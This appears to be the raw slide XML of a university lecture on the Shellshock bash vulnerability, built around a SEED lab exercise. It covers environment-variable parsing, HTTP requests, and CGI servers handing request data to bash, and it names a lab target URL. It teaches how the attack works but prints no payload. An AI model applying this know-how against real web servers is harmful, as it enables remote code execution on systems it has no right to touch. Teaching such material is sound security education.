          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342900" y="2707705"/>
            <a:ext cx="8763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conditions are needed to exploit the vulnerability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target process must run a vulnerable version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>bash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target process gets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>untrusted user input via environment variables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CC7C17-FDB4-389D-675C-64D3B4CE6E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="4480915"/>
            <a:ext cx="2286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a bash shell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8CCAAA-D308-8F5A-59A7-CAF29BE0C4F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="4480915"/>
            <a:ext cx="3048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flawed parsing logic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82C292-557C-7D5F-D5F8-8730AD8A2AA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9461500" y="4152672"/>
            <a:ext cx="22098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Shellshock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17311-ADFD-1F56-2172-2AD752C9667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2819400" y="4747615"/>
            <a:ext cx="16002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1EEB0-2C27-B056-74B7-7B9E2BF0050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7467600" y="4724172"/>
            <a:ext cx="1993900" cy="2344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8A881E5E-E3F2-F66B-3FCA-3E2C4C368EDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9901767" y="3337915"/>
            <a:ext cx="685800" cy="685800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3B67D8-F789-7AE5-FEFB-1CCFD96B352E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5105400" y="5028972"/>
            <a:ext cx="838200" cy="533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7B78C48-FA4A-22E2-EFBA-82B730257F4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="5273883"/>
            <a:ext cx="2971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Env variables containing function definitions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9C653A-B892-EB5E-DB8F-3254FF77483E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="457200"/>
            <a:ext cx="8610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shellshock vulnerability is a bug in the code when converting environment variables to function definitions, which allows for an attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>execute arbitrary code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2543383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ED975-AFD0-3C35-F40B-7C6B22642ADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="457200"/>
            <a:ext cx="7375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be attacking a web server that is running a vulnerable version of bash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www.seedlab-shellshock.com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4C73D-A748-6A10-9B24-BC8AF2FE76FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2514600"/>
            <a:ext cx="5943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does a web server accept new environment variables?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>How do we send our malicious payload?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254264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D7EFB-461D-CE56-3031-4E1A390E7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685800"/>
            <a:ext cx="4229100" cy="4610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EB47A0-161F-B9BB-2707-4C63E9CCF188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="2057400"/>
            <a:ext cx="33874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 Internet </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>(Part 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1452069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7D366-5E18-8B54-BA16-CD9A58392895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="76200"/>
            <a:ext cx="980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internet, we often communicate in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>client server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B12972-E11F-FC7E-4D71-8EE1FB21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57400"/>
            <a:ext cx="5985426" cy="21288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990600" y="838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876800" y="838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94D56-DCA6-EF3D-4BAA-E790D1765AAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="4610595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“Give me this picture located at this URL”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B274B2-B94C-5F1B-DCEB-F1E82DD5CCB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6823626" y="3352800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7BF1CB-FB1A-57AA-ABA2-FB680AED3C4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7838440" y="322320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83F46E-3E5C-2671-AB9E-8796B12E6208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6781800" y="3581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087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87D366-5E18-8B54-BA16-CD9A58392895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="76200"/>
            <a:ext cx="980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the internet, we often communicate in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>client server architecture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990600" y="838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876800" y="8382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B94D56-DCA6-EF3D-4BAA-E790D1765AAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="4610595"/>
            <a:ext cx="4854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“Give me this picture located at this URL”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520" y="2438400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800" y="2246195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828800" y="2246195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4084400" y="2246195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2509600" y="1676400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85BAE8-50C2-3743-89A3-306343EF0E3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6823626" y="3352800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A5B40-E35E-70C9-0E45-C02DCB6C31D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7838440" y="3223206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438F2-A925-9285-2D96-5CE011A2484D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6781800" y="3581400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DF5FDC-28C3-AB44-C455-942785BD5BA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078146" y="5276051"/>
            <a:ext cx="8712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Hosts on the internet must communicate with each other through various internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>protocols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F6ACFBA-300B-D650-B22B-E48E910F0294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5009599">
            <a:off x="6080487" y="4460598"/>
            <a:ext cx="381000" cy="609599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761AAC-F991-F272-47B5-90C1A30BAA09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6586587" y="4442231"/>
            <a:ext cx="437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needs to translated into a protocol that a computer can understand</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1521859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B85BAE8-50C2-3743-89A3-306343EF0E3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6300386" y="2726655"/>
            <a:ext cx="948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A5B40-E35E-70C9-0E45-C02DCB6C31D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="2597061"/>
            <a:ext cx="1447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Backend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program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8B438F2-A925-9285-2D96-5CE011A2484D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6258560" y="295525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0ADE85-2CB2-5154-2A56-FE687722DA44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361866" y="4241798"/>
            <a:ext cx="594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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is the common protocol for transmitting internet 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6629400" y="4216867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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8398551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24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D53E7-4C04-5730-18F2-D8FD841A48AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="3160171"/>
            <a:ext cx="4703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Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> section contains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HTTP Method (GET, POST, DELETE)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URL </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E142B0A0-BBB2-43EF-859B-AFCDFE2FF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296399"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6578744" y="4996000"/>
          <a:ext cx="4917440" cy="369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17253">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3815830195"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3500187">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="189842313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1450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DEC8BB3-D164-98DA-47AF-36062E478643}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6852993" y="543703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6C5ED0-4787-EBF4-F329-2D5A36D806E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="5447687"/>
            <a:ext cx="4116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http://www.seedlab-shellshock.com/cgi-bin/vul.cgi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56FFFD-0844-DB53-37EC-32ACF0EF1C76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6852993" y="582439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5A48F2-A906-7CB3-DA12-40AC25306C24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="5835048"/>
            <a:ext cx="3677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http://www.cs.montana.edu/pearsall/dog.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222209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2C2C71-F7BD-C63C-2D01-6BF5C5ABEE80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="4124648"/>
            <a:ext cx="49580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When we want to get something from a server, we issue an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>HTTP Request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350090" y="2159002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749587-AAF3-DDF8-8ED6-D6196587A9E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="212055"/>
            <a:ext cx="0" cy="5297588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80D971-D767-8512-06CC-A9C86E5145D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6706605" y="222215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 Request have a specific format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7172152" y="977847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7172151" y="1580215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7172151" y="2193879"/>
            <a:ext cx="3476177" cy="6168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7134859" y="953728"/>
            <a:ext cx="3513469" cy="185695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8D53E7-4C04-5730-18F2-D8FD841A48AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="3160171"/>
            <a:ext cx="47038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Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> section contains information about they request (key value pairs)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7BCA7AF-120E-C1E6-68BA-8370AED8A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4461449"/>
            <a:ext cx="3485648" cy="172367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F4C805F-80CC-2892-DAFC-91520D151C21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2465839" y="6077398"/>
            <a:ext cx="726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!!! We can add whatever headers we want to an HTTP request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407214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7010400" y="1143000"/>
            <a:ext cx="2057400" cy="312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A9FFF2-2A84-CD28-533E-618811F9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68525"/>
            <a:ext cx="5029200" cy="132999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7D4266-119C-FCEE-224D-3D9DBAD38121}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5486400" y="2438400"/>
            <a:ext cx="1600200" cy="5334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2CF033-A4D1-5F14-EF07-23D1AB04D328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="4689200"/>
            <a:ext cx="8622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process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> is an instance of a program running on a computer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2528749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3934500" y="1995946"/>
            <a:ext cx="7620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Request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CAEE4D-F354-F055-1558-7C5145F91DDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="4722124"/>
            <a:ext cx="91418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Common Gateway Interface (CGI) server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>is where we have a server middleman that creates external programs to handle requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427791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256303" y="2441230"/>
            <a:ext cx="10947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598B12-C852-0DC4-0FA2-7EC868DBA8F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3456144" y="1967319"/>
            <a:ext cx="838924" cy="42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EAF68-99F3-9B69-B62F-CAC1989C6CDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1372273" y="1863604"/>
            <a:ext cx="604439" cy="44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F4DE03-410C-C8E2-8A25-EC1D29A67005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="4745591"/>
            <a:ext cx="8865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server fetches the content, its sends it back to the user as an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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1746765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77C006-3A97-2397-ED04-D6A5F3387FFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467360" y="21205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CA13B-D2BE-D7BF-5C23-2553F66F99B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4353560" y="21205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(victim)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A6072-D44F-EC45-B7DC-21CA8476C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812255"/>
            <a:ext cx="1003380" cy="16523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E30058-3F8C-E068-56EB-4CDC8E8A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560" y="1620050"/>
            <a:ext cx="1512839" cy="18047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4A04E-D284-45D1-AB18-8A6FC5D0F2C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1305560" y="1620050"/>
            <a:ext cx="609600" cy="42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77FBD5-7BE7-6C26-CF96-94E372E4640B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3561160" y="1620050"/>
            <a:ext cx="685800" cy="303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loud 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D187F656-B8AC-1633-186F-4840EC6DF2FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1986360" y="1050255"/>
            <a:ext cx="1447800" cy="990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B98A7-6555-F013-EFA7-3BAD5B18E040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1256303" y="2441230"/>
            <a:ext cx="1094700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HTTP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FD73C3-025A-D0FA-FA00-B4E2F29E7D7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9929468" y="1524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5F08D4-87DA-992F-34E3-D94F6883BAF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9922467" y="548444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A067F8-72C6-C532-D4ED-9F31F9700F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9910572" y="920849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D10917-7078-F8F3-2614-CBA671E25123}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9892174" y="128280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AB6C5D-AB3F-CC00-CDA3-48D613A6624D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8859944" y="100135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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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86D5A-8908-3845-0385-49544C0F5188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1915240" y="3322636"/>
            <a:ext cx="6121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10.9.0.80 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(www.seedlab-shellshock.com)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154A1-5AB1-5E51-D328-979D6BFDC386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8221908" y="1626782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85D722-1D33-EFA3-0EE4-01CFF7EFC3A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="2224546"/>
            <a:ext cx="1752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4126324-2533-D08E-9F11-48F4554DE6AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6025813" y="3200400"/>
            <a:ext cx="189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A4309EF-DF6D-9A74-2FFA-37011DF416BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="1615405"/>
            <a:ext cx="167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Call CGI to process request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955783-945A-AD28-73CC-A6AE06220AF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6290539" y="2688107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Send response back to server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B598B12-C852-0DC4-0FA2-7EC868DBA8F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3456144" y="1967319"/>
            <a:ext cx="838924" cy="42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EAF68-99F3-9B69-B62F-CAC1989C6CDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1372273" y="1863604"/>
            <a:ext cx="604439" cy="440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F4DE03-410C-C8E2-8A25-EC1D29A67005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="4745591"/>
            <a:ext cx="8865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 the server fetches the content, its sends it back to the user as an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>HTTP Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3433206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3074" name="Picture 2" descr="Common Gateway Interface (CGI). Common Gateway Interface (CGI) is a set… |  by Manvi_Singh | Medium">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{067083E2-5B1A-573D-19FA-56E3D03B5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57200"/>
            <a:ext cx="9353550" cy="556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1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D61EF-29BA-F319-8DBB-25AF2A8D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838200"/>
            <a:ext cx="11277600" cy="5038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217A2-291B-036F-598D-88330E9B4F61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="275437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Viewing HTTP Requests/Response with Chrome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0950731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72DBC3-80EE-6895-AB46-487C7C904C29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="457200"/>
            <a:ext cx="6121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Take Home Message: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Web servers quite often need to run other programs to respond to a request.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common to translate request parameters into environment variables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Environment variables are then passed onto a child process (such as bash), to do the actual work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="What is Common Gateway Interface? | How It Works | Skill &amp; Career Move">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
